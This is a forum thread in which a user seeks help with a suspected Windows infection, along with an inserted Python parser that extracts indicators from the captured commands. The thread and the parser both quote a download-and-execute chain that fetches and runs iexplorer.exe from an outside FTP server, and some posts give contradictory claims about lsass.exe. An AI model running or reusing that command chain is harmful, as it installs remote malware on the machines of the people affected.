Author Topic: Uhm, virus? Help?  (Read 10577 times)

I think that HijackThis sees it as missing and unknown owner because it's been edited.

This is what I was saying :) Idk about your backdoor thing though.

When you open task manager, is isass.exe capitalized or isn't it?

This is what I was saying :) Idk about your backdoor thing though.
I did some research

http://www.averscanner.com/scan/2d/lsass-exe.shtml

It can allow for backdoor remote accessing.

There's a very high chance it's lsass.exe causing this.

http://www.processlibrary.com/directory/files/lsass/23809/
« Last Edit: February 03, 2013, 03:07:18 PM by Blockzillahead »

Although the site itself is questionable, if I recall correctly it actually can be used for remote backdoor accessing.

I did some research

http://www.averscanner.com/scan/2d/lsass-exe.shtml

It can allow for backdoor remote accessing.

There's a very high chance it's lsass.exe causing this.

http://www.processlibrary.com/directory/files/lsass/23809/

Stop linking to those sites. Lsass is not something bad (they say it is). It's the login authentication system for Windows. His file might have been modified (which is bad), that's all.

When you open task manager, is isass.exe capitalized or isn't it?
No, it's not capitalized.

Stop. Lsass is not something bad. It's the login authentication system for Windows. His file might have been modified (which is bad), that's all.
That's what I'm trying to say. A modified lsass.exe = Trojan. I know it's a normal service that's supposed to be running but it can be edited into a Trojan with backdoors.
« Last Edit: February 03, 2013, 03:12:39 PM by Blockzillahead »

If lsass was modified, a program probably would have noticed. Don't go deleting things at random. Also, it should be uncapitalised; people keep capitalising and uncapitalising it on this page.

You should probably just head to C:\Windows\System32 and check when it was last modified.
« Last Edit: February 03, 2013, 03:13:40 PM by tails »

If lsass was modified, a program probably would have noticed. Don't go deleting things at random. Also, it should be uncapitalised; don't listen to blockzillahead's capitalisation of it.
Yeah I have an odd habit of doing that to words. Ignore it.

Scan is 97% complete.
Completed.

"Windows Resource Protection found corrupt files but was unable to fix some of them.
Details are included in the CBS.Log windir\Logs\CBS\CBS.log"

CBS.log(zip): https://dl.dropbox.com/u/30951213/Programs/CBS.zip
CBS.log(plain text):  https://dl.dropbox.com/u/30951213/Documents/CBS.log
« Last Edit: February 03, 2013, 03:17:29 PM by Evar678 »

Tails, he's not deleting stuff, he's just using the system file checker.
Try starting command prompt as Administrator and then type this:
Code:
sfc /scannow

don't listen to blockzilla at least.
i feel like he's going to forget you even more.

Any luck with the log file?

Actually I'd be surprised if there was, considering it's a 5 MB file, 30k+ lines.

Edit:
Also, it seems that a value changes every time this runs. For example, this is what it typed when I posted this OP:

Code:
start %systemroot%\system32\cmd.exe
del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

And this is what it typed about one minute ago:
Code:
ystemroot%\system32\cmd.exe
del eq&echo open xxx.xxx.xxx.xxx xxxx >> eq&echo user 10515 16135 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
I put x's where the IP was because I'm not sure what it was; I wasn't in a text input area when it started typing. I only got the last two parts of the IP, which was something like 209.418 or something.
« Last Edit: February 03, 2013, 03:31:14 PM by Evar678 »
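As an added example that is not part of the thread, here is a small Python parser that turns a captured keystroke-injection chain like the two quoted above into incident-response indicators: the FTP server and port, the plaintext credentials, the script file, the file that is fetched and then run, and the cleanup. The first sample is the capture quoted in the post; the second is constructed to mirror the truncated, masked capture, and the parser flags that its host is not a real address.

```python
import ipaddress
import re
# Constructed samples: the first is the capture quoted in the post above; the second
# mirrors the poster's later capture (prefix truncated, host masked, other credentials).
CAPTURE_1 = (
    "start %systemroot%\\system32\\cmd.exe\n"
    "del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq "
    "&echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq"
)
CAPTURE_2 = (CAPTURE_1[8:].replace("181.166.154.188 7191", "xxx.xxx.xxx.xxx xxxx")
             .replace("16446 10097", "10515 16135"))

# "echo <text> >> <file>" segments build the FTP script one line at a time.
ECHO_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*>>\s*(?P<file>\S+)$")

def host_is_masked(host):
    """True when the host is not a real IP (e.g. the poster's xxx.xxx.xxx.xxx)."""
    try:
        ipaddress.ip_address(host or "")
        return False
    except ValueError:
        return True

def parse_injected_command(capture):
    """Extract IR indicators from one captured command chain (returned as a dict)."""
    ind = {"host": None, "port": None, "username": None, "password": None,
           "script_file": None, "fetched": [], "executed": [], "cleanup": []}
    segments = [s.strip() for line in capture.splitlines() for s in line.split("&")]
    script_lines = []
    for seg in segments:
        m = ECHO_RE.match(seg)
        if m:                                   # one line of the ftp -s: script
            ind["script_file"] = m.group("file")
            script_lines.append(m.group("text"))
        elif seg.lower().startswith("del "):    # cleanup of the script / payload
            ind["cleanup"].append(seg[4:].strip())
    for parts in (sl.split() for sl in script_lines if sl.strip()):
        verb, args = parts[0].lower(), parts[1:]
        if verb == "open" and args:             # server and (non-default) port
            ind["host"], ind["port"] = args[0], (args[1] if len(args) > 1 else "21")
        elif verb == "user" and args:           # plaintext FTP credentials
            ind["username"] = args[0]
            ind["password"] = args[1] if len(args) > 1 else None
        elif verb == "get" and args:            # the dropped file
            ind["fetched"].append(args[0])
    # A fetched file name appearing as its own command segment means it was run.
    ind["executed"] = [s for s in segments if s in ind["fetched"]]
    ind["host_masked"] = host_is_masked(ind["host"])
    return ind
```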

don't listen to blockzilla at least.
i feel like he's going to forget you even more.
Although blockzillahead may be somewhat confused, he just wants to help Evar and make sure that he solves the problem. He just needs to stay calm; he already has good cooperation.

have you tried antibiotics?